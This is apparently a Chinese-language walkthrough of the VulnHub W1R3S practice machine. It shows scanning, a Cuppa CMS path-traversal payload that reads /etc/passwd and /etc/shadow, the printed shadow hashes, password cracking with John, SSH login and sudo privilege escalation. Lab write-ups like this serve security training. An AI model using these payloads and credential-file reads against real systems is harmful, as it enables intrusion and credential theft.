靶机练习-W1R3S

admin 2023年2月17日19:09:47评论32 views字数 2004阅读6分40秒阅读模式
靶机练习-W1R3S

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

靶机练习-W1R3S

靶机简介

Name: W1R3S: 1.0.1
Difficulty:Beginner/Intermediate
Flag : 1 Flag located in /root directory
靶机下载地址:https://www.vulnhub.com/entry/w1r3s-101,220/

靶机练习-W1R3S

实验环境

攻击机:kali(192.168.11.166)
靶机:Linux,IP自动获取
攻击机与靶机都使用net网络连接,在同一网段下


靶机练习-W1R3S

渗透测试步骤

1、使用nmap扫描网段,获得靶机IP

sudo nmap -sn 192.168.11.0/24

靶机练习-W1R3S

2、使用masscan扫描目标端口

sudo masscan -p1-65535 --rate=10000 192.168.11.165

靶机练习-W1R3S

3、对开放的端口进行探测

sudo nmap -sT -sV -O -p 21,22,80,3306 192.168.11.165

靶机练习-W1R3S

可以看到目标有http、mysql、ftp、ssh等服务,Linux系统。

4、先从http服务入手,访问80端口,发现是一个apache的默认页面

靶机练习-W1R3S

5、扫描目录

sudo dirsearch -u http://192.168.11.165/

靶机练习-W1R3S

发现有一个administrator路径、wordpress、installation这些

6、首先看一下wordpress,发现是一个登录的,输入账号密码尝试一下跳转到一个错误页面,暂时不考虑

靶机练习-W1R3S

靶机练习-W1R3S

7、接着看administrator路径,发现是安装页面,同时发现使用了Cuppa CMS

靶机练习-W1R3S

碰到安装页面不建议进一步攻击,万一真给目标重装了后果是很严重的。所以接下来的思路是找Cuppa CMS漏洞

8、使用searchsploit搜索漏洞

searchsploit Cuppa

靶机练习-W1R3S

searchsploit -m 25971

靶机练习-W1R3S

发现是一个文件包含漏洞,查看25971.txt文档,看如何利用

靶机练习-W1R3S

9、拼接漏洞路径访问,确定路径为:

http://192.168.11.165/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

但是没有返回结果,尝试了编码、另一种攻击语句,都没有响应内容,最后发现这玩意有问题,不是get请求的参数,而是post请求的参数

靶机练习-W1R3S

10、发现可以成功读取shadow文件

靶机练习-W1R3S

获得如下几个密文:

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

11、使用John破解shadow文件中的密文,将上面获得的密文保存为hash.txt

john hash.txt --wordlist /usr/share/john/password.lst

靶机练习-W1R3S

成功破解出 w1r3s 用户的密码为 computer

12、目标开放了22端口,尝试使用ssh远程连接

ssh [email protected]

靶机练习-W1R3S

13、提权

sudo -l

靶机练习-W1R3S

发现当前用户可以sudo任何命令,直接sudo su提权到root

靶机练习-W1R3S

14、获得flag
在/root目录下获得flag

靶机练习-W1R3S

靶机练习-W1R3S

总结

该靶场的难点在于对Cuppa CMS漏洞的利用,需要自己拼接漏洞路径,要多尝试几次,得到/etc/shadow文件内容之后,对密码进行破解,获得了w1r3s用户的密码,ssh远程连接后,提权的方法比较常规也比较简单。


安恒信息

杭州亚运会网络安全服务官方合作伙伴

成都大运会网络信息安全类官方赞助商

武汉军运会、北京一带一路峰会

青岛上合峰会、上海进博会

厦门金砖峰会、G20杭州峰会

支撑单位北京奥运会等近百场国家级

重大活动网络安保支撑单位

靶机练习-W1R3S

END

靶机练习-W1R3S
靶机练习-W1R3S
靶机练习-W1R3S

长按识别二维码关注我们


原文始发于微信公众号(雷神众测):靶机练习-W1R3S

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月17日19:09:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机练习-W1R3Shttps://cn-sec.com/archives/1557791.html

发表评论

匿名网友 填写信息